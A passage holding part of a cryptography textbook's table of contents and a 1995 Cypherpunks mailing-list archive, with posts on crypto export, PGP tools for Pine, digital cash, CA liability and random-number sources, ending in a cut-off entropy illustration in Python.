          Signatures; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; One-Way Accumulators; All-or-Nothing
          Disclosure of Secrets; Key Escrow

Chapter 5:  Advanced Protocols
          Zero-Knowledge Proofs; Zero-Knowledge Proofs of Identity;
          Blind Signatures; Identity-Based Public-Key Cryptography;
          Oblivious Transfer; Oblivious Signatures; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          Secure Elections; Secure Multiparty Computation; Anonymous
          Message Broadcast; Digital Cash

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          Symmetric Key Length; Public-Key Key Length; Comparing
          Symmetric and Public-Key Key Length; Birthday Attacks
          against One-Way Hash Functions; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; Nonlinear Keyspaces; Transferring Keys;
          Verifying Keys; Using Keys; Updating Keys; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; Choosing a Cipher Mode; Interleaving; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; Encrypting
          Data for Storage; Hardware Encryption vs. Software
          Encryption; Compression, Encoding, and Encryption; Detecting
          Encryption; Hiding Ciphertext in Ciphertext; Destroying
          Information

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; Number Theory;
          Factoring; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          Differential and Linear Cryptanalysis; The Real Design
          Criteria; DES Variants; How Secure is DES Today?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; NewDES; FEAL-N; REDOC; Loki; Khufu and
          Khafre; RC2; IDEA; MMB; CA-1.1; Skipjack

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; Blowfish; SAFER K-64; 3-Way; Crab; SXAL8/MBAL;
          RC5; Other Block Algorithms; Theory of Block Cipher Design;
          Using One-Way Hash Functions; Choosing a Block Algorithm

Chapter 15:  Combining Block Algorithms
          Double Encryption; Triple Encryption; Doubling the Block
          Length; Other Multiple Encryption Schemes; CDMF Key
          Shortening; Whitening; Cascading Multiple Block Algorithms;
          Combining Multiple Block Algorithms

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; Design and Analysis of Stream
          Ciphers; Stream Ciphers using LFSRs; A5; Hughes XPD/KPD;
          Nanoteq; Rambutan; Additive Generators; Gifford; Algorithm
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; Wake; Feedback with Carry Shift Registers; Stream
          Ciphers using FCSRs; Nonlinear Feedback Shift Registers; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          Cascading Multiple Stream Ciphers;  Choosing a Stream
          Cipher; Generating Multiple Streams from a Single Pseudo-
          Random Sequence Generator; Real Random-Sequence Generators

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; One-Way Hash Functions using Symmetric Block
          Algorithms; Using Public-key Algorithms; Choosing a One-Way
          Hash Function; Message Authentication Codes

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; Finite
          Automaton Public-Key Cryptosystems

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA Variants; GOST
          Digital Signature Algorithm; Discrete Logarithm Signature
          Schemes; Ong-Schnorr-Shamir; ESIGN; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; Converting
          Identification Schemes to Signature Schemes

Chapter 22:  Key-Exchange Algorithms
          Diffie-Hellman; Station-to-Station Protocol; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; Fortified Key
          Negotiation; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; Designated Confirmer Signatures; Computing with
          Encrypted Data; Fair Coin Flips; One-Way Accumulators; All-
          or-Nothing Disclosure of Secrets; Fair and Failsafe
          Cryptosystems; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; Sesame; IBM Common Cryptographic
          Architecture; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; Pretty Good Privacy
          (PGP); Smart Cards; Public-Key Cryptography Standards;
          Universal Electronic Payment System; Clipper; Capstone; AT&T
          Model 3600 Telephone Security Device

Chapter 25:  Politics
          National Security Agency; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; Public Key Partners; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; Conditional Access for Europe;
          ISO/IEC 9979; Professional, Civil Liberties, and Industry
          Groups; Sci.Crypt; Cypherpunks; Patents; U.S. Export Rules;
          Foreign Import and Export of Cryptography; Legal Issues

Afterword by Matt Blaze

Source Code
          DES; LOKI91; IDEA; GOST; Blowfish; 3-Way; RC5; A5; SEAL;
          WAKE

References



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Thu, 24 Aug 95 22:14:33 PDT
Subject: Re: Article in Time Magazine
In-Reply-To: <199508220416.AA03981@personal.eunet.fi>
Message-ID: <41eg3r$8er@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


"Kari Laine" <buster@klaine.pp.fi> wrote:


>> How many exported software products might have backdoors,
>> vulnerabilities, and hidden procedures which are harmful if ever
>> activated?

>I am not saying it is so I am just speculating

>Windows ?

>Microcode of big host systems like the one from IBM?

>Each mainframe comes with a line attached. Customers
>typically don't have the faintest idea what is going on
>that line. I know one customer who stuck a printer
>there and thought - now we will see ... well he ended
>up with printouts he did not have the faintest idea
>of their context.

>Now does anyone have real evidence of possible
>backdoors?

>Best Regards
>Kari
>Kari Laine          buster@klaine.pp.fi
>LAN Vision Oy       Tel. +358-0-502 1947
>Sinikalliontie 14   Fax  +358-0-524 149
>02630 ESPOO         BBS  +358-0-502 1576/1456
>FINLAND

All the more reason to use Linux or FreeBSD - an OS you have the source for,
on hardware that you can examine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 23 Aug 95 05:04:40 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <199508231214.HAA20793@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>>Try these URLs:
>>
>>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>>Croatia: http://pgp.rasip.fer.hr/
>>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/
>
>But how is the average non-US web surfer supposed to find them, if even
>I (who at least knows about the various CP sites) can't even locate them
>without asking on the list?

I, for one, am including them on my homepage (which is now accepting ecash
donations :-).

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 04:11:57 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d04ac60b6165a45@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8/23/95, Steven Weller wrote:
>In such a system, where does credit come in? If I have a certificate that
>is worth X, then does the recipient know that it's from my "credit card"?
>How do I obtain credit, and in what form does it exist?

You have to follow me through the looking glass a little bit here, but
remember that we're talking about a world where microprocessors and
bandwidth are everywhere.  The compute cycles and the bandwidth have to be
available for this stuff, but given those, it's easy to see how this works.

To replicate a credit card in a certificate-based scenario, you issue a
bond, just like the old days. (Remember that Babylonian clay thingy with
"J. Nebuchadnezzar"'s seal on it for three cows?) A bond is a certificate
with your signature saying that you'll pay a certain amount of money on a
certain date, or that you owe a certain amount of money, and will pay
interest at a certain rate to the bearer on a certain schedule, and
principal on a certain date, *or* you could issue a bond with coupons that
could be sent in to collect the interest.

This is what a bank does with a credit card, only the transactions with you
are book entries, and nowadays, the bank even lumps your credit card debt
with others and then "securitizes" them by selling bonds collateralized with
that debt on the open market.

Now the issuing of personal bonds instead of a book entry credit card works
the same way, in that someone has to actually give you the money, and it
may be unlikely that a store knows your reputation.  It could be that a
bank gives you a guarantee, a certificate, to buy your debt up to a certain
amount, and that makes your bonds instantly tradable on the market.  The
store could then sell your bond to the bank, or to the open market,
depending on where the price is highest.  With enough processing power and
bandwidth, it could be resold while you're walking out the door with your
purchase.

>
>Furthermore, how do we assess the value of real physical things in a system
>like this?

"The price of anything is the foregone alternative." (Walter Johnson)
Snappy comebacks aside, the price of something, physical or not, has
nothing to do with its method of purchase, excluding transaction costs,
which for both book entry and certificate economies are measured in
processing and bandwidth costs. You advertise your house for a certain
price, I pay you the price in digital cash, you give me the deed to the
house. QED.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 23 Aug 95 05:37:44 PDT
To: cypherpunks@toad.com
Subject: NYS_ize
Message-ID: <199508231237.IAA18677@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-23-95. NYPaper:


   "Cyberspace Prophets Discuss Their 'Revolution' Face to
   Face."

      Supporters of Newt Gingrich gathered at a conference
      with the savants of cyberspace to create a common vision
      for America's future in the digital age. Conservative
      venture capitalists and self-proclaimed former hippies
      and anarchists all seemed to agree that America is
      entering an "information revolution" that will
      profoundly restructure the political, economic and
      social landscape. Discussion among the panelists was
      heavy on theory and often long on ego.


   "Checks Delivered Via E-Mail Are Planned."

      A group of banks and technology companies said yesterday
      that they would design a system to create "electronic
      checks" that could be used to make payments over the
      Internet or other electronic mail systems. Unlike the
      electronic bill-payment services increasingly offered by
      banks, electronic checks could be sent directly by
      customers to their recipients, without going through the
      bank. The electronic check would contain all the
      information that is on today's paper checks. In
      addition, the check would contain a "digital signature,"
      a security code that could prove that the check was
      authorized by the account holder.


   Lion to ewe: NYS_ize (13kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:18:12 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <ac60a09d2802100493a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:00 AM 8/23/95, J. Kent Hastings wrote:

>Tim says that quantum codebreaking and nanotech ain't gonna happen,
>because of things he explained in the past on the list, now available in
>the archive. I found a great Web version of the cypherpunks archive at
>http://www.hks.net/cpunks/index.html and will indeed catch up on the
>quantum coherence subject.

I didn't mean to sound so dismissive, just that we've been around and
around on this one, and it's very, very, very far off. Some interesting
philosophical interests, but no evidence that the "instant factorization"
will ever be feasible.

>RSA Data Security printed an article in their newsletter, by one of the
>inventors of working quantum cryptography, which stated that there is
>a risk of cracking RSA because of efficient hardware factorization. Why
>would they make this up about their own product? OK Tim, I'll catch up
>before making further comments on quantum codebreaking.

They put this stuff in their newsletters because they have to fill space,
it's a sexy topic, and it's been in the news. But they won't keep running
the same article every few months, which is my main point.


>Now about nanotech: The Moore(?) scale mentioned here says the
>processing power of hardware capacity doubles every 12 or 18 months for
>a given amount of money. In about 20 years only nanotech will be on the
>curve. Will hardware progress just come to a grinding halt then or what?
>What's going on here? I thought cpunx were pro-nanotechnology.

Well, though this will sound like name-dropping, I know both Gordon Moore
of Intel and Eric Drexler of nanotechnology fame. In fact, I used to go to
Ted Kaehler's "Assembler Multitudes" nanotech discussion group in Palo
Alto, every month for a couple of years. So, I follow nanotech pretty
closely.

And it's as far off now as it was in 1985 when I first met Eric. (Well, not
technically, but essentially.)

Moore's Law is an observation of past behavior, not a law of nature. Gordon
thought the curve would "slow down" around 1980 or so. It didn't, for
various reasons. But many of us expect it will.

Consider that a new wafer fab capable of building these "Moore's Law"
devices has increased in price from about $50 million a couple of decades
ago to about $1.5 billion today. Lots of reasons for this, which I won't go
into here (yes, discussions may be found in the archives!). If this
"Barrett's Law" trend continues, the cost of a new wafer fab will equal the
GNP sometime around 2020.

Before anyone (Kent?) mentions table-top nanotech factories, ha!

Anyway, there are discussion groups for nanotech. Plenty of places to
discuss the progress and lack of progress. Not even the simplest logic
device has ever been built out of molecular gears and whatnot, and the
claim that biotech will be the route to nanotech is of course only
speculation.

This is why I think nanotech discussion is inappropriate for this list.
More specifically, why I think vague promises about what nanotech may
someday mean are far afield from any real issues.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Anderson <bboards@optical.bms.com>
Date: Wed, 23 Aug 95 07:02:18 PDT
To: nobody@valhalla.phoenix.net (Anonymous)
Subject: MD5 in DOS
In-Reply-To: <199508230815.DAA29613@ valhalla.phoenix.net>
Message-ID: <9508231358.AA19405@zymurgy>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Anon" == Anonymous  <nobody@valhalla.phoenix.net> writes:

    Anon> cpunks,
    Anon> I'm looking for an md5 binary that will run on dos.  can anyone
    Anon> give me a pointer?

    ftp://oak.oakland.edu:/SimTel/msdos/fileutil/xsum11.zip




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:30:57 PDT
To: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Subject: Personal: Any relation to Dan Farkas?
Message-ID: <ac60a6a829021004feea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Personal

Henry,

I just saw your name and wondered if you're any relation to Dan Farkas, a
mathematician (last I heard) who attended the same university I did in the
late 1960s.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 07:03:06 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v02120d04ac60b6165a45@[199.0.65.105]>
Message-ID: <199508231402.KAA10229@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> A bond is a certificate with your signature saying that you'll pay a
> certain amount of money on a certain date, or that you owe a certain
> amount of money, and will pay interest at a certain rate to the
> bearer on a certain schedule, and principal on a certain date, *or*
> you could issue a bond with coupons that could be sent in to collect
> the interest.

Actually, what you've just described is general commercial paper, not
just a bond. Anything that lists a sum certain in money to be paid on
a date certain (with various other parameters, too, like a place) is
negotiable commercial paper. Checks, notes, and other instruments are
all commercial paper. They are not, by the way, certificates in the
sense that I suspect you mean.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:37:28 PDT
To: perry@piermont.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac60a78b2a021004345e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:53 PM 8/23/95, Robert Hettinga wrote:
>At 10:02 AM 8/23/95, Perry E. Metzger wrote:
>
>>Actually, what you've just described is general commercial paper, not
>>just a bond. Anything that lists a sum certain in money to be paid on
>>a date certain (with various other parameters, too, like a place) is
>>negotiable commercial paper. Checks, notes, and other instruments are
>>all commercial paper. They are not, by the way, certificates in the
>>sense that I suspect you mean.
>
>I really don't know. If a digital personal debt certificate isn't a bond,
>but is a subset of commercial paper, we may be quibbling about definitions,
>like Tim was saying.

Whoa, there!

I wasn't saying we were "quibbling" about definitions, I was saying that
different people have different names for things and different
interpretations, and that it behooves us to figure out what the real
definitions are, the standard names, and not invent new names when existing
names will do.

And that one benefit of class libraries for the "things" of commerce,
finance, crypto, etc., may be to make it clearer what is being described.

Just my two "aptical bearer-verified physico-tokens."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 23 Aug 95 01:25:42 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.HPP.3.91.950823101258.24669A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> a few carry the various international versions of PGP. That's it. I know
> that there are several European ftp sites that have other cryptographic
> software as well, but I sure as hell can't find them by browsing the web.

Hmm... I started from 'scratch' (Yahoo, a popular take-off site) and
within 10 min found 'everything' on:

ftp://ftp.dsi.unimi.it/pub/security/crypt

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 23 Aug 95 09:21:44 PDT
To: Samuel Tardieu <sam@inf.enst.fr>
Subject: Re: True Names and Webs of Trust
In-Reply-To: <"8TnD63.0.a82.oVlEm"@gargantua>
Message-ID: <199508231621.KAA27079@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> >>>>> "Bryce" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
> (in a PGP signed message)
> 
> [...]
> Bryce> You are quite right that this paragraph was unclear. 
> [...]
> 
> Bad signature, doesn't match file content :))) Bryce, why don't you
> really PGP-sign a mail when you agree you were unclear ? :)))


:-)


Good one.  The truth is that I was testing to see if anyone paid attention to
my sigs.   Thanks for your response!  I promise not to deliberately
invalidate any more clearsigs.


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDtVZPWZSllhfG25AQGfvQQAiBDxjYwPTukPfX5vjn8ZOMWmuzYznJax
25CDar/W8LgP3vKV8pNMUHfDUj8EN8JwvPnV/1Q++jgWcgZ8Bis0FLt59wznqm8I
Ke9hiFAWxn6KHuAiz5nvlsh0xOuTwoJ/rSaQHJZlulvG6ZK1SeK0rfmY/MNMrCrc
OLr7j1JVWHc=
=yBpE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:56:56 PDT
To: cypherpunks@toad.com
Subject: Re: Personal: Flub
Message-ID: <ac60acd12d0210047191@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 PM 8/23/95, Timothy C. May wrote:
>Personal
>
>Henry,
>
>I just saw your name and wondered if you're any relation to Dan Farkas, a
>mathematician (last I heard) who attended the same university I did in the
>late 1960s.

Sorry about this!

I hit the "Cancel" button as soon as the transfer started, and had hoped
I'd caught it before it went out to the list.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 23 Aug 95 07:44:50 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: Re: PGP for pine
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <Pine.3.85.9508231051.A50962-0100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995, Sameer R. Manek wrote:

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> The only PGP software I could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.

Yes, and me too.  Someone sent me a package that relied upon reconfiguring 
Pine using the alternate editor option as a hook and it has never worked 
well.  This is important.  I am trying to convince my co-workers to start 
using PGP regularly and an easy interface may not be one of the best 
arguments to make (for encrypting regularly) but it's one that works on 
lots of people. 

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Wed, 23 Aug 95 07:55:42 PDT
To: seawolf@challenger.atc.fhda.edu ("Sameer R. Manek")
Subject: Re: PGP for pine
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <199508231455.KAA00345@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "seawolf" == "Sameer R Manek" <seawolf@challenger.atc.fhda.edu> writes:

 seawolf> Does anyone know of an addon to the Pine mailer that
 seawolf> supports PGP?  The only PGP software I could find required
 seawolf> me to first compose a letter in an editor then run it
 seawolf> through a pgp signature program then finally read it into my
 seawolf> favorite mailer.

 seawolf> I'm looking for something that is hopefully transparent, or
 seawolf> if not relatively quick to do.

"mkpgp" is probably the best PGP/Pine interface.

Email "deviate@lipschitz.sfasu.edu" for more information.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDtBSnr7ES8bepftAQGa8wP+OPvqYNQ5d/UEEo5WKjlmhg7eEtgzsURR
V92IRWAmtm/CyYS/TZSLjQaCJhjw0OCy5+tcELtJYZeUUxpLtwg1Cm4h3RtowyBj
Ou69FTKjqb56/n52afVe1mt7WGEXO9AfomrNc/rWVwhIWSMpEhTWJiccju4cVY4U
mac8kq4h5mI=
=Bsru
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 23 Aug 95 09:24:58 PDT
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: PGP for pine/PINESIGN 2.0
In-Reply-To: <Pine.SOL.3.91.950823114854.14341A-100000@welchlink.welch.jhu.edu>
Message-ID: <Pine.SOL.3.91.950823111838.20013C-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I use mkpgp.  It is a script that requires a lot of setting up, but once
you learn what you are doing it makes sense.  Depending on how you want 
it, it can be totally transparent.  Personally, I took it off of total 
transparency, and now use it by invoking it with Atl-&

I lost the site where I got it from, but I have it on disk if anybody 
wants it sent.  It includes instructions, and once it is going is totally 
slick.

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDtVmt82JgvRKzQZAQGkAwP/cZU3+P2I6HB1fso4b1acv9O/QZWmPBw7
paP1jvkn0Vs9mU3yfF5kbvv6v7o/RMgm21+v/TVxnWnPnvDbHbqG/qnJmSHo1bhZ
lAoq26iwD1Urg8HXVPbnOti8PrboF2J5/cBIyQyC7tXtNI9t+ZgFu8V90QmPOHLl
wuhvOaHPjAg=
=iR37
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 23 Aug 95 09:31:04 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508231630.AA01613@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:
[...hypothetical screwups by CA leading to lawsuits snipped...]
>  Since (in the absence of any rules given the newness of the
>  technology) it is very likely that a rich CA would get nuisance
>  suits every time a deal in which it participated went sour, the
>  absence of rules will either raise costs CAs have to charge (e.g.
>  to buy insurance) or will keep rich folk out of the industry (which
>  isn't good either, since you want CAs to buy security and to last).
>  Thus the need for clear liability rules.

What about when the CA signing key is stolen, factored, or otherwise falls  
into the wrong hands, thereby possibly making every signature made by the CA  
worthless, or at least questionable?

I assume liability will be based on the CA's efforts to ensure the integrity  
of the signatures it makes (and therefore the confidentiality of the secret  
key components), but what constitutes due diligence?  As we all know,  
security measures cover a very wide range and can reach ridiculous  
proportions on both ends of the spectrum...  How much security will be  
'enough' from a legal standpoint...?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 23 Aug 95 10:51:17 PDT
To: cypherpunks@toad.com
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <v01510106ac5cd6edbafb@[193.74.217.20]>
Message-ID: <199508231739.LAA24796@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Spring writes:

> I've been looking at using the Mac's Sound Input Manager for hardware RNG.
[...]
> In the simplest case, where the microphone is not attached, the signal
> consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
> problem transforming this into uniformly distributed RN's : just hash the
> buffer with MD5.
[...]
> Does anybody have any experience/advice in this area?

Yeah, I played with this idea a while ago and eventually gave up on it, 
exactly because of those long runs of 0x80's and 0x7f's. I'm not sure
how you estimate 0.65 bits of entropy per byte sampled when you have long
strings of repeating bytes like that. 

The thing is that event timings (the Time Manager allows you microsecond
resolution) and mouse position measurements give you so much more entropy
than the sound port that it's hardly worth it, IMO.

                                  -- Will
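
An added illustration of the objection above (not code from either poster): it compares a frequency-only entropy estimate with one that accounts for the long runs, and counts how many distinct MD5 digests such a buffer can actually produce. The buffer is constructed, and the run-length range and all function names are assumptions.

```python
import hashlib
import itertools
import math
import random
from collections import Counter

# Assumed run-length range in samples; constructed for the demo, not measured.
LO, HI = 40, 60


def make_idle_buffer(n_runs, seed=1995):
    """Constructed sample: alternating runs of 0x80 and 0x7f, as described for
    an input with no microphone attached. Only the run lengths vary."""
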